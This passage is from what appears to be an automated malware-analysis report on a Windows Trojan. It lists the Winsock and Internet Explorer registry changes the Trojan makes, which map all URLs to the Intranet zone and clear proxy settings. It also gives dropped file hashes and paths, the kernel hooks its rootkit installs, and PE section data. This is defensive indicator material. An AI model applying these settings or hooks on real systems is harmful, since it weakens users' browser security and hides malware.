"BitNames" = " Error Unusual Info Debug"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1001"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Provider List" = ""
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 2.0 Provider ID" = "30 18 5F 8D 73 C2 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Setup Version" = "4105"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Known Static Providers" = "Tcpip, NwlnkIpx, NwlnkSpx, AppleTalk, IsoTp"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F CF 21 29 2E 4E 77 FE B6 5E A5 43 70 0E 28 BA"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"AppleTalk" = "A0 17 3B 2C DF C6 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "1"
"Num_Catalog_Entries" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"IsoTp" = "B0 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"McsXns" = "B1 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000002]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
The process EXE_temp3.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCR\Shell.User\Group]
"bl" = "A9 91 9C 93 24 46 01 23 62 18 79 19 0C 77 50 72"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"
[HKCR\Shell.User]
"mmc" = "0050563cacd6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\Shell.User\Group\001]
"(Default)" = "4A 7C 2C 77 6E 02 24 14 9D DB D7 C6 BB 04 7A 13"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"LibraryPath" = "%SystemRoot%\System32\winrnr.dll"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"DisplayString" = "网络位置知晓 (NLA) 名称空间"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Serial_Access_Num" = "4"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"StoresServiceClassInfo" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\Shell.User]
"nam" = "58lm/temptation.bin"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Enabled" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Version" = "0"
[HKCR\Shell.User\Group]
"lb" = "E0 89 2F 53 1D 22 70 19 48 38 3F 78 54 6B 83 93"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCR\Shell.User\Group]
"lh" = "C6 B4 D0 9F A2 CB D4 B0 BB AD FF A7 56 06 63 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Num_Catalog_Entries" = "3"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"SupportedNameSpace" = "15"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Shell.User\Group\001]
"dat" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 0B 74 25 87 0B 8C 56 3B B8 3C F3 4E 22 C1 A7"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"SupportedNameSpace" = "32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1027"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_Protocol_Catalog" = "Protocol_Catalog9"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"StoresServiceClassInfo" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"DisplayString" = "NTDS"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"WinSock_Registry_Version" = "2.0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Version" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Enabled" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\Shell.User\Group]
"cfg" = "57 56 1B 01 5E 4C 05 5C 14 19 18 15 1E 0A 13 59"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"DisplayString" = "Tcpip"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"StoresServiceClassInfo" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"Enabled" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_NameSpace_Catalog" = "NameSpace_Catalog5"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"SupportedNameSpace" = "12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"ProviderId" = "40 9D 05 22 9E 7E CF 11 AE 5A 00 AA 00 A7 11 2B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"ProviderId" = "EE 37 26 3B 80 E5 CF 11 A5 55 00 C0 4F D8 D4 AC"
"Version" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Serial_Access_Num" = "12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"ProviderId" = "3A 24 42 66 A8 3B A6 4A BA A5 2E 0B D7 1F DD 83"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Num_Catalog_Entries" = "11"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process MiniIE.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 D7 28 7A 25 5D D9 D2 9F EC C0 58 AD FB 76 5B"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\JMt\MiniIE.exe"
The process qtool.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 B6 E0 D6 CA 25 68 19 49 38 F7 A3 05 6F 90"
The process EXE_temp0.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 3F D9 80 23 28 AE DA BA 09 DF 20 13 55 0A DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process wpzir.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 1B A5 9B 95 89 B1 80 07 DC 08 1E E3 81 E5 9C"
The process %original file name%.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9A 60 99 5B 65 DF 0F 28 7E 33 17 29 04 B9 BF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp1.EXE" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp4.EXE" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
30b0c990aec1f50be231a3856ecb3bf8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp0.exe |
aed6d5df54ffc8b690ac09b59b3ca430 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp1.EXE |
2a1032cde760529d39f4c5f8726dc2a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp2.exe |
a14c1a37f8bfa01fac48c2e55e0ba1b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp4.EXE |
a15e8668aa777e4d4150aee35d2ff6a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Sawrdxeyd.exe |
a0616a47dd5ee80322aef4316c392c28 | c:\Program Files\Common Files\Lkcjzquw.exe |
8ae4a1d90f2a6e9385945db349908df5 | c:\Program Files\Common Files\mdhc\dsau.exe |
cf31b64c744a98a0407f4507ae113702 | c:\WINDOWS\JMt\MiniIE.exe |
0bdf9d8c796730d85f4a1a249a033f8d | c:\WINDOWS\JMt\sys32\qtool.exe |
c20aa25e91066fccc444a58542c23dd9 | c:\WINDOWS\JMt\sys32\shock.dll |
5d92b4c13bafd09fad76ef97c48fec0e | c:\WINDOWS\JMt\sys32\shock.exe |
add24b3c6cb353cdad827d12c751427d | c:\WINDOWS\JMt\win32\DPro.sys |
a76ad9fe26c1986b1d7f1c8ef8d44c7b | c:\WINDOWS\JMt\win32\reTcp.sys |
43577fc3cc5c7db31ee2f778d738fda8 | c:\WINDOWS\JMt\win32\rename.exe |
cc686eb2b7a4ade59e1c4092cba060a9 | c:\WINDOWS\JMt\win32\svchots.exe |
e9e72a6dbeacd5baa07688de88180a48 | c:\WINDOWS\JMt\wpzir.exe |
39462f857848c335921707727b66df46 | c:\WINDOWS\share\ico.dll |
c6ad526a469588556ff14961929e0713 | c:\WINDOWS\share\rsvp\objs.exe |
a131b4be9f388351e102feb40192db80 | c:\WINDOWS\system32\DqKgbb.dll |
51af4e81bc4bd3abf1cb8ce8703b364f | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwCreateSection
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1630 | 4096 | 2.08739 | a5ac40d413ebeb6ce9558f2e31e30273 |
.rdata | 8192 | 1002 | 4096 | 1.10247 | 845b3880bb89b7f2d62318a9a4946b4b |
.data | 12288 | 1172 | 4096 | 0.052325 | 98570c295ac0b95b533a0c5458850e63 |
.rsrc | 16384 | 928 | 4096 | 0.559435 | 26a9e24fa9407d501ca0b0c40ee8d6a1 |
.fyf | 20480 | 73728 | 73728 | 5.42306 | 5de1b1bb94e796f2272dd007d3f6e0a0 |
.FYF | 94208 | 151552 | 151552 | 4.48946 | b063438bbfbe3ad481ac57d58a6e5403 |
